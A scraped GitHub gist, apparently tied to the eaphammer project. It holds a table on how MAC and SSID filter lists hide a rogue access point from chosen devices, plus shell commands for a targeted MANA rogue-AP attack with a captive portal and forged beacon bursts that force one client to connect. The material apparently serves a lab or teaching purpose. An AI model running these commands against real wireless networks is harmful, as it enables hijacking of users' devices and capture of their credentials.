Skip to content

Instantly share code, notes, and snippets.

javascript:(function(e,a,g,h,f,c,b,d)%7Bif(!(f=e.jQuery)%7C%7Cg%3Ef.fn.jquery%7C%7Ch(f))%7Bc=a.createElement(%22script%22);c.type=%22text/javascript%22;c.src=%22http://ajax.googleapis.com/ajax/libs/jquery/%22+g+%22/jquery.min.js%22;c.onload=c.onreadystatechange=function()%7Bif(!b&&(!(d=this.readyState)%7C%7Cd==%22loaded%22%7C%7Cd==%22complete%22))%7Bh((f=e.jQuery).noConflict(1),b=1);f(c).remove()%7D%7D;a.documentElement.childNodes%5B0%5D.appendChild(c)%7D%7D)(window,document,%221.3.2%22,function($,L)%7B$('%23header,%20.pagehead,%20.breadcrumb,%20.commit,%20.meta,%20%23footer,%20%23footer-push,%20.wiki-actions,%20%23last-edit,%20.actions,%20.header,.site-footer,.repository-sidebar,.file-navigation,.gh-header-meta,.gh-header-actions,#wiki-rightbar,#wiki-footer').remove();%20$('%23files,%20.file').css(%7B%22background%22:%22none%22,%20%22border%22:%22none%22%7D);%20$('link').removeAttr('media');%7D); var removeMe = document.getElementsByClassName("file-header")[0]; removeMe.parentNode.removeChild(removeMe);

Keybase proof

I hereby claim:

  • I am s0lst1c3 on github.
  • I am s0lst1c3 (https://keybase.io/s0lst1c3) on keybase.
  • I have a public key ASAwf8iGvbwK2QoVYAqSydRY3OP30p5wG7OqvaOygMuUWwo

To claim this, I am signing this object:

| MFACL Type | MFACL Mode | Effect
| - - - | - - - | - |
| MAC-based | whitelist | the rogue AP will only respond to probe requests from specific devices, making it invisble to any device not in the whitelist
| MAC-based | blacklist | the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist
| SSID-based | whitelist | the rogue AP will only respond to probe requests for specific ESSIDs, making it invisible to devices whose PNLs do not intersect with the whitelist
| SSID-based | blacklist | the rogue AP will ignore probe requests for specific ESSIDs
@s0lst1c3
s0lst1c3 / MFACL-Table.md
Created October 22, 2019 07:53
MFACL Table

| MFACL Type | MFACL Mode | Effect | - - - | - - - | - | | MAC-based | whitelist | the rogue AP will only respond to probe requests from specific devices, making it invisble to any device not in the whitelist | MAC-based | blacklist | the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist | SSID-based | whitelist | the rogue AP will only respond to probe requests for specific ESSIDs, making it invisible to devices whose PNLs do not intersect with the whitelist | SSID-based | blacklist | the rogue AP will ignore probe requests for specific ESSIDs

We can make this file beautiful and searchable if this error is corrected: It looks like row 2 should actually have 3 columns, instead of 4. in line 1.
MFACL Type,MFACL Mode,Effect
MAC-based,whitelist,the rogue AP will only respond to probe requests from specific devices, making it invisble to any device not in the whitelist
MAC-based,blacklist,the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist
SSID-based,whitelist,the rogue AP will only respond to probe requests for specific ESSIDs, making it invisible to devices whose PNLs do not intersect with the whitelist
SSID-based,blacklist,the rogue AP will ignore probe requests for specific ESSIDs
We can make this file beautiful and searchable if this error is corrected: It looks like row 3 should actually have 3 columns, instead of 4. in line 2.
MFACL Type,MFACL Mode,Effect
MAC-based,whitelist,the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist
MAC-based,blacklist,the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist
SSID-based,whitelist,the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist
SSID-based,blacklist,the rogue AP will ignore probe requests for specific ESSIDs
MFACL Type MFACL Mode Effect
MAC-based whitelist the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist
MAC-based blacklist the rogue AP will ignore probe requests from specific devices making it invisible to any device not in the blacklist
SSID-based whitelist the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist
SSID-based blacklist the rogue AP will ignore probe requests for specific ESSIDs
# create mac address whitelist containing the mac address of our target station (another spoiler)
echo '11:22:33:11:22:33' > mac-whitelist.txt
# execute a mana attack but only respond to ESSIDs in whitelist
./eaphammer -i wlan0 \
--bssid de:ad:be:ef:13:37 \
--mana \
-e bananas \
--ssid-whitelist ssid-whitelist.txt \
--mac-whitelist mac-whitelist.txt \
--known-beacons \
--captive-portal
# transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file ssid-whitelist.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5